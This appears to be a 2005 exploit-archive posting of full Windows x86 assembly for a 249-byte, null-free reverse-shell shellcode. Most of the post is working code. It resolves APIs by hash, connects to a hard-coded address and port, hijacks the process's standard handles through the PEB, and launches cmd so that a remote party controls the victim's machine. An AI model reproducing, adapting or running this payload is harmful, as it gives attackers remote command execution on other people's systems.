nooil.txt

nooil.txt: Posted Aug 17, 2005; Authored by Matthieu Suiche; New generation shellcode using 'nooil tricks' methodology. 249 bytes reverse generic shellcode without loader (no null byte).; tags | shellcode; SHA-256 | fd35c001c46f13468f2d40f4e5dee47a5e1803c677189bf3889635375ef9f4bd; Download | Favorite | View

nooil.txt

We use the PEB for the Output/Input/Error Handles.

typedef struct PEB
BOOLEAN InheritedAddressSpace ;
BOOLEAN ReadImageFileExecOptions ;
BOOLEAN BeingDebugged ;
BOOLEAN Spare ;
HANDLE Mutant ;
PVOID ImageBaseAddress ;
PPEB LDR DATA LoaderData ;
PRTL USER PROCESS PARAMETERS ProcessParameters ;
...
typedef struct RTL USER PROCESS PARAMETERS
ULONG MaximumLength ;
ULONG Length ;
ULONG Flags ;
ULONG DebugFlags ;
PVOID ConsoleHandle ;
ULONG ConsoleFlags ;
HANDLE StdInputHandle ; +18h
HANDLE StdOutputHandle ; +1Ch
HANDLE StdErrorHandle ; +20h
...

So with the nooil tricks we have now :
mov eax,dword ptr fs :[18h]
mov eax,dword ptr ds :[eax+30h]
mov eax,dword ptr ds :[eax+10h]
mov ecx, hClientSocket
mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD INPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD OUTPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD ERROR HANDLE,hClientSocket) ;

249 bytes Reverse Generic Shellcode without loader(no null byte) : 

comment *
-----------------------------------------------------------------
---- New generation shellcode using my "nooil tricks" methods ---
----    (c) 2005 - Matthieu Suiche / msuiche@gmail.com        ---
249 bytes Reverse Generic Shellcode without loader(no null byte)
-----------------------------------------------------------------
hehe hi metasploit's guys ;)
*
.386
.model flat, stdcall

assume fs:nothing

LoadLibraryA    equ 0D6C3D898h
WSAStartupA     equ 0C7B3B4CBh
WSASocketA      equ 0B8ACB6C6h
connect     equ 06EE2D2C8h
system      equ 0E873E6D8h
ExitProcessA    equ 0D7D8EA95h
; ------------------------------
sin_addr    equ 0B01A8C0h ; 192.168.1.11
sin_port    equ 3713h  ; 4919
; ------------------------------
str_cmd      equ 0FF646D63h

; ----------------------------------------------------
_nooil_ segment public ; writable section
;.
; ----- CODE ----- 
scode:  
  jmp short _eip
  GetEip:
  pop    edi
  jmp short EntryPoint
_eip:
  call  GetEip
Kernel32BaseAddr:
  pushad
  test  eax, eax
  jnz    MyGetProcAddr
  ; eax = 0
  mov   eax, dword ptr fs:[eax+30h]
  mov   eax, dword ptr ds:[eax+0ch]
  mov   esi, dword ptr ds:[eax+1ch]
  lodsd
  mov   eax, dword ptr ds:[eax+08h]
MyGetProcAddr:
  mov    edx, eax
  
; - PE
  add    edx, dword ptr ds:[edx+3ch]
  
; - Export Table
  mov    edx, dword ptr ds:[edx+78h]
  add    edx, eax
  
  mov   ebx, dword ptr ds:[edx+20h]
  add    ebx, eax
  
  xor    ecx, ecx
  mov    ebp, eax
  
FindAddr:
  inc    ecx
  mov     edi, dword ptr ds:[ebx+ecx*4]
  add    edi, eax

  mov    esi, dword ptr [edi]    
  add    esi, dword ptr [edi+4]
  cmp    esi, [esp+36]
  jz    AddrFound
  jmp    short FindAddr
  
AddrFound:

  mov     ebx, dword ptr ds:[edx+24h]
  add     ebx, ebp
  mov     cx,word ptr ds:[ebx+ecx*2]
  
  mov     ebx, dword ptr ds:[edx+1Ch]
  add     ebx, ebp
  add     ebp, dword ptr ds:[ebx+ecx*4]

  mov    dword ptr [esp+28], ebp
  popad
  retn

EntryPoint:
  xor    eax, eax
  xor    ecx, ecx
  push  LoadLibraryA
  call  edi              ; MyGetProcAddr(LoadLibraryA);
  mov    ebp, eax
  
  push  cx
  push    word ptr '23'
  push    '_2sw'
  push  esp
  call  eax    ; LoadLibraryA("ws2_32");
  
  mov    ebx, eax
  
  push  WSAStartupA
  call  edi    ; MyGetProcAddr(WSAStartupA)
  
  
  mov    esi, esp
  add    si, -301h
  push  esi
  push  2
  call  eax    ; WSAStartup(2,&WSAstruct);
  
  mov    eax, ebx
  
  push  WSASocketA
  call  edi    ; MyGetProcAddr(WSASocketA);
  
  xor    esi, esi
  push  esi
  push  esi
  push  esi
  push  esi
  inc    esi
  push  esi
  inc    esi
  push  esi
  call  eax    ; WSASocket(2,1,0,0,0,0);
  
  xchg  ebx, eax ; ebx = sockfd , eax = ws2_32

  push  sin_addr
  push  word ptr sin_port
  push  si
  mov    esi, esp
  
  push  connect
  call  edi    ; MyGetProcAddr(connect)
  
  push  10h
  push  esi
  push  ebx
  call  eax    ; connect(sockfd, &struct, sizeof(struct));
  
  push  ax
  push  word ptr 'tr'
  push  'cvsm'
  push  esp
  call  ebp    ; LoadLibraryA("msvcrt");
  
  push  system
  call  edi    ; MyGetProcAddr(system);

  ; ----------------------------- nooil tricks ----------------------------------
  xor    ecx, ecx
  mov    ecx,dword ptr fs:[ecx+18h]
  mov    ecx,dword ptr ds:[ecx+30h]
  mov    ecx,dword ptr ds:[ecx+10h]
  mov    dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient);
  mov     dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient);
  mov     dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient);
  ; -----------------------------------------------------------------------------
  

  push    str_cmd
  inc    byte ptr [esp+3]
  push  esp
  call  eax  ; system("cmd");
  
  ; Exit
  push  ExitProcessA
  call  edi    ; MyGetProcAddr(ExitProcessA)
  call  eax    ; ExitProcessA();
end scode
; ------ END CODE ------
;.
_nooil_ ends
; ----------------------------------------------------

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

nooil.txt

nooil.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

nooil.txt

Share This

nooil.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems